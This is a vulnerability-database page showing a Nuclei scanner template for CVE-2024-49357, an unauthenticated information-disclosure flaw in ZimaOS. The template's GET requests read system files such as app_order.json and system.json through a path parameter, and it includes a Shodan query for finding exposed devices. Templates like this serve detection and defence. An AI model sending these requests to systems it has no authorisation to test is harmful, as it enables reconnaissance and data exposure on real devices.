Lucene search
K

ZimaOS <= v1.2.4 - Sensitive Information Disclosure

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 36 Views

ZimaOS up to version 1.2.4 exposes installed apps and system info via unauthenticated API endpoints.

Related
Refs
Code
id: CVE-2024-49357

info:
  name: ZimaOS <= v1.2.4 - Sensitive Information Disclosure
  author: DhiyaneshDk
  severity: high
  description: |
    ZimaOS is a fork of CasaOS, an operating system for Zima devices and x86-64 systems with UEFI. In version 1.2.4 and all prior versions, the API endpoints in ZimaOS, such as `http://<Server-IP>/v1/users/image?path=/var/lib/casaos/1/app_order.json` and `http://<Server-IP>/v1/users/image?path=/var/lib/casaos/1/system.json`, expose sensitive data like installed applications and system information without requiring any authentication or authorization. This sensitive data leak can be exploited by attackers to gain detailed knowledge about the system setup, installed applications, and other critical information. As of time of publication, no known patched versions are available.
  impact: |
    Attackers can access sensitive system and application data, potentially aiding further malicious activities or reconnaissance.
  remediation: Upgrade ZimaOS to v1.2.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-49357
    - https://github.com/IceWhaleTech/ZimaOS/issues
    - https://github.com/advisories/GHSA-hg2h-q5h6-r5c4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-49357
    cwe-id: CWE-200,CWE-862
    epss-score: 0.20599
    epss-percentile: 0.97209
  metadata:
    verified: false
    max-request: 2
    vendor: zimaos
    product: zimaos
    shodan-query: "ZimaOS"
  tags: cve,cve2024,zimaos,casaos,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/v1/users/image?path=/var/lib/casaos/1/app_order.json"
      - "{{BaseURL}}/v1/users/image?path=/var/lib/casaos/1/system.json"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"installed_apps":'
          - '"os_version":'
          - '"cpu_info":'
        condition: or

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b6a9981e20812dd99c2e63c6c7682b9ee5e37b9055361a4b6bd84c198e50ec8a02205e30d1a151c2ffc88b724163eeb64dde279f07e2af1f17641481f476a706b04b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2026 02:39Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5
EPSS0.20599
SSVC
36